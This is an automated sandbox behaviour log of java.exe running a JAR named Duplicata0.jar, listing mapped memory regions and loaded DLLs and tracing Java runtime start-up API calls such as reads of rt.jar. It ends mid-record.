# Flog Txt Version 1 # Analyzer Version: 1.11.0 # Analyzer Build Date: Sep 1 2016 14:29:02 # Log Creation Date: 02.09.2016 07:55 Process: id = "1" image_name = "java.exe" filename = "c:\\program files\\java\\jre1.8.0_92\\bin\\java.exe" page_root = "0x7f09e240" os_pid = "0xb6c" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files\\Java\\jre1.8.0_92\\bin\\java.exe\" -jar \"C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar\" " cur_dir = "C:\\Users\\DSsDPMx042\\Desktop\\" Region: id = 133 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 134 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 135 start_va = 0x40000 end_va = 0x42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 136 start_va = 0xe0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 137 start_va = 0xda0000 end_va = 0xdd2fff entry_point = 0xda8dae region_type = mapped_file name = "java.exe" filename = "\\Program Files\\Java\\jre1.8.0_92\\bin\\java.exe" Region: id = 138 start_va = 0x77200000 end_va = 0x7733bfff entry_point = 0x77200000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 139 start_va = 0x77440000 end_va = 0x77440fff entry_point = 0x77440000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 140 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 141 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 142 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 143 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 144 start_va = 0x75510000 end_va = 0x75559fff entry_point = 0x75517de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 145 start_va = 0x75900000 end_va = 0x759d3fff entry_point = 0x7594bde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 146 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 147 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 148 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 149 start_va = 0x74110000 end_va = 0x742adfff entry_point = 0x7413e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" Region: id = 150 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x766649e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 151 start_va = 0x76bf0000 end_va = 0x76c90fff entry_point = 0x76c22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 152 start_va = 0x76ca0000 end_va = 0x76d68fff entry_point = 0x76cbd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 153 start_va = 0x76d70000 end_va = 0x76dc6fff entry_point = 0x76d89ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" Region: id = 154 start_va = 0x76dd0000 end_va = 0x76e1dfff entry_point = 0x76dd9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 155 start_va = 0x76f70000 end_va = 0x7701bfff entry_point = 0x76f7a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 156 start_va = 0x77020000 end_va = 0x770bcfff entry_point = 0x77053fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" Region: id = 157 start_va = 0x77350000 end_va = 0x77359fff entry_point = 0x7735136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" Region: id = 158 start_va = 0x773d0000 end_va = 0x773e8fff entry_point = 0x773d4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 159 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 160 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 161 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 162 start_va = 0x75830000 end_va = 0x758fbfff entry_point = 0x7583168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 163 start_va = 0x76630000 end_va = 0x7664efff entry_point = 0x76631355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Region: id = 164 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 165 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 166 start_va = 0x210000 end_va = 0x211fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 167 start_va = 0x220000 end_va = 0x226fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 168 start_va = 0x330000 end_va = 0x430fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 169 start_va = 0x440000 end_va = 0x441fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 170 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 171 start_va = 0x5a0000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 172 start_va = 0x6a0000 end_va = 0xa92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 173 start_va = 0xde0000 end_va = 0x19dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 174 start_va = 0x6dee0000 end_va = 0x6df9efff entry_point = 0x6def1dfc region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files\\Java\\jre1.8.0_92\\bin\\msvcr100.dll" Region: id = 175 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 176 start_va = 0xc10000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 177 start_va = 0x6d510000 end_va = 0x6d8dafff entry_point = 0x6d7cde76 region_type = mapped_file name = "jvm.dll" filename = "\\Program Files\\Java\\jre1.8.0_92\\bin\\client\\jvm.dll" Region: id = 178 start_va = 0x70ef0000 end_va = 0x70f21fff entry_point = 0x70ef37f1 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" Region: id = 179 start_va = 0x72f00000 end_va = 0x72f06fff entry_point = 0x72f01120 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\System32\\wsock32.dll" Region: id = 180 start_va = 0x748a0000 end_va = 0x748a8fff entry_point = 0x748a1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" Region: id = 181 start_va = 0x77340000 end_va = 0x77345fff entry_point = 0x77341782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" Region: id = 182 start_va = 0x77360000 end_va = 0x77364fff entry_point = 0x77361438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" Region: id = 183 start_va = 0x773f0000 end_va = 0x77424fff entry_point = 0x773f145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" Region: id = 184 start_va = 0x470000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 185 start_va = 0x6f9b0000 end_va = 0x6f9bbfff entry_point = 0x6f9b57be region_type = mapped_file name = "verify.dll" filename = "\\Program Files\\Java\\jre1.8.0_92\\bin\\verify.dll" Region: id = 186 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 187 start_va = 0x6e0f0000 end_va = 0x6e110fff entry_point = 0x6e1028ba region_type = mapped_file name = "java.dll" filename = "\\Program Files\\Java\\jre1.8.0_92\\bin\\java.dll" Region: id = 188 start_va = 0x450000 end_va = 0x450fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 189 start_va = 0x460000 end_va = 0x460fff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 190 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x4d0000 region_type = mapped_file name = "2924" filename = "\\Users\\DSSDPM~1\\AppData\\Local\\Temp\\hsperfdata_DSsDPMx042\\2924" Region: id = 191 start_va = 0xaa0000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 192 start_va = 0x19e0000 end_va = 0x1caefff entry_point = 0x19e0000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Region: id = 193 start_va = 0x6e0d0000 end_va = 0x6e0e2fff entry_point = 0x6e0d979c region_type = mapped_file name = "zip.dll" filename = "\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll" Region: id = 194 start_va = 0x4e0000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 195 start_va = 0x1cb0000 end_va = 0x3caffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 196 start_va = 0xba0000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 197 start_va = 0xc20000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 198 start_va = 0x3e00000 end_va = 0x13dfffff entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 199 start_va = 0x13e00000 end_va = 0x143affff entry_point = 0x13e00000 region_type = mapped_file name = "classes.jsa" filename = "\\Program Files\\Java\\jre1.8.0_92\\bin\\client\\classes.jsa" Region: id = 200 start_va = 0x143b0000 end_va = 0x1480ffff entry_point = 0x0 region_type = private name = "private_0x00000000143b0000" filename = "" Region: id = 201 start_va = 0x14a00000 end_va = 0x14f6ffff entry_point = 0x14a00000 region_type = mapped_file name = "classes.jsa" filename = "\\Program Files\\Java\\jre1.8.0_92\\bin\\client\\classes.jsa" Region: id = 202 start_va = 0x15600000 end_va = 0x156bffff entry_point = 0x15600000 region_type = mapped_file name = "classes.jsa" filename = "\\Program Files\\Java\\jre1.8.0_92\\bin\\client\\classes.jsa" Region: id = 203 start_va = 0x15800000 end_va = 0x1580ffff entry_point = 0x0 region_type = private name = "private_0x0000000015800000" filename = "" Region: id = 204 start_va = 0xd40000 end_va = 0xd8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 205 start_va = 0x3cb0000 end_va = 0x3cfffff entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 206 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 207 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 208 start_va = 0x3d00000 end_va = 0x3dbffff entry_point = 0x3d00000 region_type = mapped_file name = "kernel32.dll.mui" filename = "\\Windows\\System32\\en-US\\kernel32.dll.mui" Region: id = 209 start_va = 0x14810000 end_va = 0x1485ffff entry_point = 0x0 region_type = private name = "private_0x0000000014810000" filename = "" Region: id = 210 start_va = 0x759e0000 end_va = 0x76629fff entry_point = 0x75a61601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" Region: id = 211 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 212 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 213 start_va = 0x76a90000 end_va = 0x76bebfff entry_point = 0x76adba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" Region: id = 214 start_va = 0x75350000 end_va = 0x7535afff entry_point = 0x75351992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" Region: id = 215 start_va = 0xcb0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 216 start_va = 0x14870000 end_va = 0x148bffff entry_point = 0x0 region_type = private name = "private_0x0000000014870000" filename = "" Region: id = 217 start_va = 0x148d0000 end_va = 0x1491ffff entry_point = 0x0 region_type = private name = "private_0x00000000148d0000" filename = "" Region: id = 218 start_va = 0x14990000 end_va = 0x149dffff entry_point = 0x0 region_type = private name = "private_0x0000000014990000" filename = "" Region: id = 219 start_va = 0x14fb0000 end_va = 0x14ffffff entry_point = 0x0 region_type = private name = "private_0x0000000014fb0000" filename = "" Region: id = 220 start_va = 0x15000000 end_va = 0x151fffff entry_point = 0x0 region_type = private name = "private_0x0000000015000000" filename = "" Region: id = 221 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 222 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 223 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 224 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 225 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 226 start_va = 0x6e0b0000 end_va = 0x6e0c5fff entry_point = 0x6e0bc0be region_type = mapped_file name = "net.dll" filename = "\\Program Files\\Java\\jre1.8.0_92\\bin\\net.dll" Region: id = 227 start_va = 0x74de0000 end_va = 0x74e1bfff entry_point = 0x74de145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" Region: id = 228 start_va = 0x74dd0000 end_va = 0x74dd5fff entry_point = 0x74dd1673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" Region: id = 229 start_va = 0x73850000 end_va = 0x7385ffff entry_point = 0x738538c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" Region: id = 230 start_va = 0x152b0000 end_va = 0x152bffff entry_point = 0x0 region_type = private name = "private_0x00000000152b0000" filename = "" Region: id = 231 start_va = 0x15290000 end_va = 0x1529ffff entry_point = 0x0 region_type = private name = "private_0x0000000015290000" filename = "" Region: id = 232 start_va = 0x6f280000 end_va = 0x6f28ffff entry_point = 0x6f281526 region_type = mapped_file name = "NapiNSP.dll" filename = "\\Windows\\System32\\NapiNSP.dll" Region: id = 233 start_va = 0x15400000 end_va = 0x1544ffff entry_point = 0x0 region_type = private name = "private_0x0000000015400000" filename = "" Region: id = 234 start_va = 0x6f1d0000 end_va = 0x6f1e1fff entry_point = 0x6f1d18f2 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" Region: id = 235 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 236 start_va = 0x74ca0000 end_va = 0x74ce3fff entry_point = 0x74cb63f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" Region: id = 237 start_va = 0x15380000 end_va = 0x153bffff entry_point = 0x0 region_type = private name = "private_0x0000000015380000" filename = "" Region: id = 238 start_va = 0x6f270000 end_va = 0x6f277fff entry_point = 0x6f27131e region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" Region: id = 239 start_va = 0x74930000 end_va = 0x74934fff entry_point = 0x749315df region_type = mapped_file name = "WSHTCPIP.DLL" filename = "\\Windows\\System32\\WSHTCPIP.DLL" Region: id = 240 start_va = 0x72300000 end_va = 0x72306fff entry_point = 0x7230128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" Region: id = 241 start_va = 0x72310000 end_va = 0x7232bfff entry_point = 0x7231a431 region_type = mapped_file name = "IPHLPAPI.DLL" filename = "\\Windows\\System32\\IPHLPAPI.DLL" Region: id = 242 start_va = 0x15450000 end_va = 0x1554ffff entry_point = 0x0 region_type = private name = "private_0x0000000015450000" filename = "" Region: id = 243 start_va = 0x72350000 end_va = 0x72355fff entry_point = 0x723514b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" Region: id = 244 start_va = 0x721e0000 end_va = 0x72217fff entry_point = 0x721e990e region_type = mapped_file name = "FWPUCLNT.DLL" filename = "\\Windows\\System32\\FWPUCLNT.DLL" Region: id = 245 start_va = 0x15940000 end_va = 0x1597ffff entry_point = 0x0 region_type = private name = "private_0x0000000015940000" filename = "" Thread: id = 1 os_tid = 0xb70 [0026.554] WSACleanup () returned 0 [0026.554] _encoded_null () returned 0x7e6a3662 [0026.554] _encoded_null () returned 0x7e6a3662 [0026.554] __clean_type_info_names_internal () returned 0x0 [0026.554] _encoded_null () returned 0x7e6a3662 [0026.555] _encoded_null () returned 0x7e6a3662 [0026.555] _encoded_null () returned 0x7e6a3662 [0026.555] _encoded_null () returned 0x7e6a3662 [0026.555] _encoded_null () returned 0x7e6a3662 [0026.556] __clean_type_info_names_internal () returned 0x0 [0026.556] _encoded_null () returned 0x7e6a3662 [0026.556] _encoded_null () returned 0x7e6a3662 [0026.556] _encoded_null () returned 0x7e6a3662 [0026.556] _encoded_null () returned 0x7e6a3662 [0026.556] _encoded_null () returned 0x7e6a3662 [0026.556] __clean_type_info_names_internal () returned 0x0 [0026.556] _encoded_null () returned 0x7e6a3662 [0026.556] _encoded_null () returned 0x7e6a3662 [0026.556] _encoded_null () returned 0x7e6a3662 [0026.556] _encoded_null () returned 0x7e6a3662 [0026.556] _encoded_null () returned 0x7e6a3662 [0026.556] __clean_type_info_names_internal () returned 0x0 [0026.557] _encoded_null () returned 0x7e6a3662 [0026.557] _encoded_null () returned 0x7e6a3662 [0026.557] _encoded_null () returned 0x7e6a3662 Thread: id = 2 os_tid = 0xbc0 [0014.907] _malloc_crt () returned 0xc1ee28 [0014.908] __dllonexit () returned 0xb0e14ab8 [0014.908] __dllonexit () returned 0xb9514ab8 [0014.908] DisableThreadLibraryCalls (hLibModule=0x6f9b0000) returned 1 [0014.945] _malloc_crt () returned 0xc1eeb0 [0014.945] __dllonexit () returned 0x213946e3 [0014.945] __dllonexit () returned 0x266946e3 [0014.945] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0014.946] DisableThreadLibraryCalls (hLibModule=0x6e0f0000) returned 1 [0014.947] atoi (_Str="1") returned 1 [0014.948] atoi (_Str="8") returned 8 [0014.948] atoi (_Str="0") returned 0 [0014.948] strlen (_Str="b14") returned 0x3 [0014.948] atoi (_Str="14") returned 14 [0014.948] strlen (_Str="92") returned 0x2 [0014.948] strncpy (in: _Dest=0x4bf9c8, _Source="92", _Count=0x2 | out: _Dest="92VV") returned="92VV" [0014.948] atoi (_Str="92") returned 92 [0015.017] _malloc_crt () returned 0xaa7108 [0015.017] __dllonexit () returned 0xb311460e [0015.017] __dllonexit () returned 0xb841460e [0015.017] DisableThreadLibraryCalls (hLibModule=0x6e0d0000) returned 1 [0015.334] strlen (_Str="java/lang/InterruptedException") returned 0x1e [0015.351] strlen (_Str="sun/misc/Cleaner") returned 0x10 [0015.356] _fullpath (in: _FullPath=0x4be960, _Path="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar", _SizeInBytes=0x400 | out: _FullPath="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar" [0015.356] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar") returned 0x2c [0015.357] FindFirstFileA (in: lpFileName="C:\\Program Files", lpFindFileData=0x4be820 | out: lpFindFileData=0x4be820) returned 0x24c2d0 [0015.357] FindClose (in: hFindFile=0x24c2d0 | out: hFindFile=0x24c2d0) returned 1 [0015.357] strlen (_Str="Program Files") returned 0xd [0015.357] FindFirstFileA (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x4be820 | out: lpFindFileData=0x4be820) returned 0x24c2d0 [0015.358] FindClose (in: hFindFile=0x24c2d0 | out: hFindFile=0x24c2d0) returned 1 [0015.358] strlen (_Str="Java") returned 0x4 [0015.358] FindFirstFileA (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92", lpFindFileData=0x4be820 | out: lpFindFileData=0x4be820) returned 0x24c228 [0015.358] FindClose (in: hFindFile=0x24c228 | out: hFindFile=0x24c228) returned 1 [0015.358] strlen (_Str="jre1.8.0_92") returned 0xb [0015.358] FindFirstFileA (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib", lpFindFileData=0x4be820 | out: lpFindFileData=0x4be820) returned 0x24c228 [0015.359] FindClose (in: hFindFile=0x24c228 | out: hFindFile=0x24c228) returned 1 [0015.359] strlen (_Str="lib") returned 0x3 [0015.359] FindFirstFileA (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar", lpFindFileData=0x4be820 | out: lpFindFileData=0x4be820) returned 0x24c228 [0015.359] FindClose (in: hFindFile=0x24c228 | out: hFindFile=0x24c228) returned 1 [0015.359] strlen (_Str="rt.jar") returned 0x6 [0015.359] _errno () returned 0xc1e118 [0015.360] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar") returned 0x2c [0015.360] strcpy (in: _Dest=0x4be970, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar" [0015.360] CreateFileA (lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_92\\lib\\rt.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0015.362] calloc (_Count=0x1, _Size=0x78) returned 0xacedb0 [0015.363] ReadFile (in: hFile=0xd4, lpBuffer=0x4bec40, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x4bebf4, lpOverlapped=0x0 | out: lpBuffer=0x4bec40*, lpNumberOfBytesRead=0x4bebf4*=0x4, lpOverlapped=0x0) returned 1 [0015.366] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x4bec24 | out: lpNewFilePointer=0x0) returned 1 [0015.366] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x33e1e00, lpNewFilePointer=0x0, dwMoveMethod=0x4beacc | out: lpNewFilePointer=0x0) returned 1 [0015.366] ReadFile (in: hFile=0xd4, lpBuffer=0x4beb4c, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x4bea9c, lpOverlapped=0x0 | out: lpBuffer=0x4beb4c*, lpNumberOfBytesRead=0x4bea9c*=0x80, lpOverlapped=0x0) returned 1 [0015.369] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x33e1e79, lpNewFilePointer=0x0, dwMoveMethod=0x4beacc | out: lpNewFilePointer=0x0) returned 1 [0015.369] ReadFile (in: hFile=0xd4, lpBuffer=0xaa8720, nNumberOfBytesToRead=0x7, lpNumberOfBytesRead=0x4bea9c, lpOverlapped=0x0 | out: lpBuffer=0xaa8720*, lpNumberOfBytesRead=0x4bea9c*=0x7, lpOverlapped=0x0) returned 1 [0015.369] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x3212cf1, lpNewFilePointer=0x0, dwMoveMethod=0x4beacc | out: lpNewFilePointer=0x0) returned 1 [0015.369] ReadFile (in: hFile=0xd4, lpBuffer=0x14810020, nNumberOfBytesToRead=0x1cf172, lpNumberOfBytesRead=0x4bea9c, lpOverlapped=0x0 | out: lpBuffer=0x14810020*, lpNumberOfBytesRead=0x4bea9c*=0x1cf172, lpOverlapped=0x0) returned 1 [0015.429] calloc (_Count=0x4d1f, _Size=0x10) returned 0xad2a00 [0015.434] calloc (_Count=0x2, _Size=0x4) returned 0xaa8730 [0015.451] strlen (_Str="java/lang/ref/Reference$1.class") returned 0x1f [0015.451] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x32eb17a, lpNewFilePointer=0x0, dwMoveMethod=0x4bed74 | out: lpNewFilePointer=0x0) returned 1 [0015.451] ReadFile (in: hFile=0xd4, lpBuffer=0xaca638, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4bed44, lpOverlapped=0x0 | out: lpBuffer=0xaca638*, lpNumberOfBytesRead=0x4bed44*=0xa0, lpOverlapped=0x0) returned 1 [0015.452] strlen (_Str="java/lang/ref/Reference$1.class") returned 0x1f [0015.452] strcpy (in: _Dest=0x4bee78, _Source="java/lang/ref/Reference$1.class" | out: _Dest="java/lang/ref/Reference$1.class") returned="java/lang/ref/Reference$1.class" [0015.453] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16d3c2e, lpNewFilePointer=0x0, dwMoveMethod=0x4be978 | out: lpNewFilePointer=0x0) returned 1 [0015.453] ReadFile (in: hFile=0xd4, lpBuffer=0x4be9b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be948, lpOverlapped=0x0 | out: lpBuffer=0x4be9b0*, lpNumberOfBytesRead=0x4be948*=0x1e, lpOverlapped=0x0) returned 1 [0015.455] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16d3c6b, lpNewFilePointer=0x0, dwMoveMethod=0x4be9b4 | out: lpNewFilePointer=0x0) returned 1 [0015.455] ReadFile (in: hFile=0xd4, lpBuffer=0xaa41a0, nNumberOfBytesToRead=0x16b, lpNumberOfBytesRead=0x4be984, lpOverlapped=0x0 | out: lpBuffer=0xaa41a0*, lpNumberOfBytesRead=0x4be984*=0x16b, lpOverlapped=0x0) returned 1 [0015.458] strlen (_Str="sun/misc/JavaLangRefAccess.class") returned 0x20 [0015.458] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x3384325, lpNewFilePointer=0x0, dwMoveMethod=0x4be6d0 | out: lpNewFilePointer=0x0) returned 1 [0015.458] ReadFile (in: hFile=0xd4, lpBuffer=0xaca638, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be6a0, lpOverlapped=0x0 | out: lpBuffer=0xaca638*, lpNumberOfBytesRead=0x4be6a0*=0xa0, lpOverlapped=0x0) returned 1 [0015.458] strlen (_Str="sun/misc/JavaLangRefAccess.class") returned 0x20 [0015.458] strcpy (in: _Dest=0x4be7d4, _Source="sun/misc/JavaLangRefAccess.class" | out: _Dest="sun/misc/JavaLangRefAccess.class") returned="sun/misc/JavaLangRefAccess.class" [0015.458] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x24bd4ac, lpNewFilePointer=0x0, dwMoveMethod=0x4be2d4 | out: lpNewFilePointer=0x0) returned 1 [0015.459] ReadFile (in: hFile=0xd4, lpBuffer=0x4be30c, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be2a4, lpOverlapped=0x0 | out: lpBuffer=0x4be30c*, lpNumberOfBytesRead=0x4be2a4*=0x1e, lpOverlapped=0x0) returned 1 [0015.460] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x24bd4ea, lpNewFilePointer=0x0, dwMoveMethod=0x4be310 | out: lpNewFilePointer=0x0) returned 1 [0015.460] ReadFile (in: hFile=0xd4, lpBuffer=0xaaf938, nNumberOfBytesToRead=0x78, lpNumberOfBytesRead=0x4be2e0, lpOverlapped=0x0 | out: lpBuffer=0xaaf938*, lpNumberOfBytesRead=0x4be2e0*=0x78, lpOverlapped=0x0) returned 1 [0015.481] GetModuleHandleA (lpModuleName="jvm.dll") returned 0x6d510000 [0015.482] GetProcAddress (hModule=0x6d510000, lpProcName="JVM_GetVersionInfo") 